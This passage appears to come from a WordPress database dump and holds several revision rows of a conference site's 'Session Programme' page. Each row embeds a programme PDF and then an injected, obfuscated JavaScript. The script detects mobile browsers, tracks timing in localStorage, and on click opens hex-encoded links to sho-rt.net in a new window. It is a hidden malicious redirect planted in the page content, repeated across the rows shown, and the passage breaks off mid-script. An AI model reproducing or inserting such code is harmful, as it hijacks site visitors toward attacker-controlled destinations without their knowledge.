(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Session Programme','','inherit','closed','closed','','5122-revision-v1','','','2023-08-23 08:41:34','2023-08-23 08:41:34','',5122,'https://gsw2023.com/?p=5390',0,'revision','',0),
(5391,1,'2023-08-23 08:43:17','2023-08-23 08:43:17','<p style=\"text-align: center;\">[pdf-embedder url=\"https://gsw2023.com/wp-content/uploads/2023/08/GSW2023-Program-2023-08-13.pdf\"]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Session Programme','','inherit','closed','closed','','5122-revision-v1','','','2023-08-23 08:43:17','2023-08-23 08:43:17','',5122,'https://gsw2023.com/?p=5391',0,'revision','',0),
(5392,1,'2023-08-23 08:43:25','2023-08-23 08:43:25','<p style=\"text-align: center;\">[pdf-embedder url=\"https://gsw2023.com/wp-content/uploads/2023/08/GSW2023-Program-2023-08-23.pdf\"]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return 